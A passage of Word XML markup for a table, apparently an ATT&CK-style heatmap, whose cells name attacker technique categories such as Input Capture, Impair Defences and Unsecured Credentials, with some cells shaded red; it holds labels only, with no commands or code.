          <w:p w14:paraId="22C0B300" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="559FCDA8" w14:textId="5832BE58" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hide Artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EA18AE2" w14:textId="0B5FA1CA" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Steal or Forge Kerberos Tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4659ECAC" w14:textId="606924D7" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Log Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02D963F8" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68DCE0A1" w14:textId="6A2AA5A9" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Input Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CA281E3" w14:textId="78CB581B" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="015DECE9" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B565B79" w14:textId="77777777" w:rsidR="00F004ED" w:rsidRPr="001019D3" w:rsidRDefault="00F004ED" w:rsidP="00F004ED">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="5671C4F6" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="163EAFC0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DE91600" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="191" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71FDFDDD" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3800F342" w14:textId="56ED1E5D" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>User Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1780FB14" w14:textId="159E456F" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Office Application Startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A2CE869" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37DCDC30" w14:textId="2DBD0B50" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Impair Defences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EF7E153" w14:textId="0B792A26" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Steal Web Session Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="768BF65B" w14:textId="695EBCBA" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7276ECA7" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5761BC93" w14:textId="3C2BFD86" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B8C419F" w14:textId="513A17E9" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Remote Access Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EBE5205" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="565D5AD0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="66959250" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="659E04AE" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A2675F4" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="191" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3087FD50" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C0DC0A6" w14:textId="61B2AC1A" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Windows Management Instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66A4914B" w14:textId="73DA66F2" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Power Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5266E727" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50BE9524" w14:textId="26480C52" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hijack Execution Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A6C54FA" w14:textId="3CEE6DAA" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Unsecured Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6904DEEC" w14:textId="727B1837" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Share Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AE8F758" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5665F596" w14:textId="7EA9CCCE" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Video Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="208B56D5" w14:textId="3CB413F2" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t xml:space="preserve">Traffic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Signaling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C8EECF7" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3225936D" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="7DCB0B87" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131AFF7A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC79AD4"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3D8B70A3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="296CEAD8" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
